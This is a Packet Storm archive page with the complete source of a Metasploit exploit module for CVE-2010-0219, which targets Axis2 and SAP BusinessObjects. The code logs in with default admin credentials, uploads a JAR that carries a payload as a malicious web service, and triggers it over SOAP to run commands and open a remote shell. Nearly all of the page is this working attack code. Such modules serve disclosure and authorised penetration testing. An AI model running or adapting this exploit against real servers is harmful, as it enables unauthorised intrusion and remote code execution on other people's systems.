what you don't know can hurt you

Axis2 / SAP BusinessObjects dswsbobje Upload Exec

Axis2 / SAP BusinessObjects dswsbobje Upload Exec
Posted Nov 16, 2010
Authored by Joshua D. Abraham | Site metasploit.com

This Metasploit module logins to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.

tags | exploit, web
advisories | CVE-2010-0219
SHA-256 | d25079aca4be2ff7c1b9c1e7d10524631a0690cd4f3947fe48034950306d88a5

Axis2 / SAP BusinessObjects dswsbobje Upload Exec

Change Mirror Download
##
# $Id: axis2_deployer.rb 11046 2010-11-15 05:12:48Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit
Rank = ExcellentRanking

HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Axis2 / SAP BusinessObjects dswsbobje Upload Exec',
'Version' => '$Revision: 11046 $',
'Description' => 'This module logins to a Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.',
'References' =>
[
# General
[ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ],
[ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ],
[ 'CVE', '2010-0219' ],
],
'Platform' => [ 'java', 'win', 'linux' ], # others?
'Targets' =>
[
[ 'Java', {
'Arch' => ARCH_JAVA,
'Platform' => 'java'
},
],
#
# Platform specific targets only
#
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
},
],

[ 'Linux X86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
},
],
],
'Author' => [ 'Joshua Abraham <jabra[at]rapid7.com>' ],
'License' => MSF_LICENSE
))

register_options(
[
Opt::RPORT(8080),
OptString.new('USERNAME', [ false, 'The username to authenticate as','admin' ]),
OptString.new('PASSWORD', [ false, 'The password for the specified username','axis2' ]),
OptString.new('PATH', [ true, "The URI path of the axis2 app (use /dswsbobje for SAP BusinessObjects)", '/axis2'])
], self.class)
register_autofilter_ports([ 8080 ])
end

def upload_exec(session)
contents=''
name = Rex::Text.rand_text_alpha(8)
services_xml = %Q{
<service name="#{name}" scope="application">
<description>
#{Rex::Text.rand_text_alphanumeric(50 + rand(50))}
</description>
<messageReceivers>
<messageReceiver
mep="http://www.w3.org/2004/08/wsdl/in-only"
class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/>
<messageReceiver
mep="http://www.w3.org/2004/08/wsdl/in-out"
class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
</messageReceivers>
<parameter name="ServiceClass">
metasploit.PayloadServlet
</parameter>
</service>
}
if target.name =~ /Java/
zip = payload.encoded_jar
zip.add_file("META-INF/services.xml", services_xml)

# We need this class as a wrapper to run in a thread. For some reason
# the Payload class is giving illegal access exceptions without it.
path = File.join(Msf::Config.install_root, "data", "java", "metasploit", "PayloadServlet.class")
fd = File.open(path, "rb")
servlet = fd.read(fd.stat.size)
fd.close
zip.add_file("metasploit/PayloadServlet.class", servlet)

contents = zip.pack
else

end

boundary = rand_text_alphanumeric(6)

data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"filename\"; "
data << "filename=\"#{name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n"
data << contents
data << "\r\n--#{boundary}--"

res = send_request_raw({
'uri' => "/#{datastore['PATH']}/axis2-admin/upload",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
'Content-Length' => data.length,
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)

if (res and res.code == 200)
print_status("Successfully uploaded")
else
print_error("Error uploading #{res}")
return
end
=begin
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/axis2-web/HappyAxis.jsp",
'method' => 'GET',
'headers' =>
{
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)
puts res.body
puts res.code
if res.code > 200 and res.code < 300
if ( res.body.scan(/([A-Z] \Program Files\Apache Software Foundation\Tomcat \d.\d)/i) )
dir = $1.sub(/: /,':') + "\\webapps\\dswsbobje\\WEB-INF\\services\\"
puts dir
else
if ( a.scan(/catalina\.home<\/th><td style=".*">(.*)&nbsp;<\/td>/i) )
dir = $1 + "/webapps/dswsbobje/WEB-INF/services/"
puts dir
end
end
end
=end


soapenv='http://schemas.xmlsoap.org/soap/envelope/'
xmlns='http://session.dsws.businessobjects.com/2007/06/01'
xsi='http://www.w3.org/2001/XMLSchema-instance'

data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"
data << '<soapenv:Envelope xmlns:soapenv="' + soapenv + '" xmlns:ns="' + xmlns + '">' + "\r\n"
data << '<soapenv:Header/>' + "\r\n"
data << '<soapenv:Body>' + "\r\n"
data << '<soapenv:run/>' + "\r\n"
data << '</soapenv:Body>' + "\r\n"
data << '</soapenv:Envelope>' + "\r\n\r\n"

print_status("Polling to see if the service is ready")
1.upto 3 do
Rex::ThreadSafe.sleep(3)

res = send_request_raw({
'uri' => "/#{datastore['PATH']}/services/#{name}",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Length' => data.length,
'SOAPAction' => '"' + 'http://session.dsws.businessobjects.com/2007/06/01/run' + '"',
'Content-Type' => 'text/xml; charset=UTF-8',
}
}, 15)
if res.code > 200 and res.code < 300
print_status("")
print_status("NOTE: You will need to delete the web service that was uploaded.")
print_status("Using meterpreter:")
print_status("rm \"webapps/#{datastore['PATH']}/WEB-INF/services/#{name}.jar\"")
print_status("Using the shell:")
print_status("cd \"webapps/#{datastore['PATH']}/WEB-INF/services\"")
print_status("del #{name}.jar")
print_status("")
break
end

end

=begin
useful for axis2 or REST
# Try to execute the payload
1.upto 5 do
Rex::ThreadSafe.sleep(3)
print_status("Polling to see if the service is ready")
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/services/#{name}/run",
'method' => 'GET',
'headers' =>
{
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)
if res.code >= 200 and res.code < 300
# This should usually mean we got a shell
break
end
end
=end

end

def exploit
user = datastore['USERNAME']
pass = datastore['PASSWORD']
path = datastore['PATH']
success = false
srvhdr = '?'
begin
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/#{path}/axis2-admin/login",
'ctype' => 'application/x-www-form-urlencoded',
'data' => "userName=#{user}&password=#{pass}&submit=+Login+",
}, 25)

if not (res.kind_of? Rex::Proto::Http::Response)
raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin not responding")
end

if res.code == 404
raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin returned code 404")
end

srvhdr = res.headers['Server']
if res.code == 200
# Could go with res.headers["Server"] =~ /Apache-Coyote/i
# as well but that seems like an element someone's more
# likely to change

success = true if(res.body.scan(/Welcome to Axis2 Web/i).size == 1)
if (res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/)
session = $1
end
end

rescue ::Rex::ConnectionError
print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin Unable to attempt authentication")
end

if success
print_good("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] successful login '#{user}' : '#{pass}'")
upload_exec(session)
else
print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] failed to login as '#{user}'")
end
end

end

Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    17 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    6 Files
  • 24
    May 24th
    19 Files
  • 25
    May 25th
    5 Files
  • 26
    May 26th
    12 Files
  • 27
    May 27th
    12 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close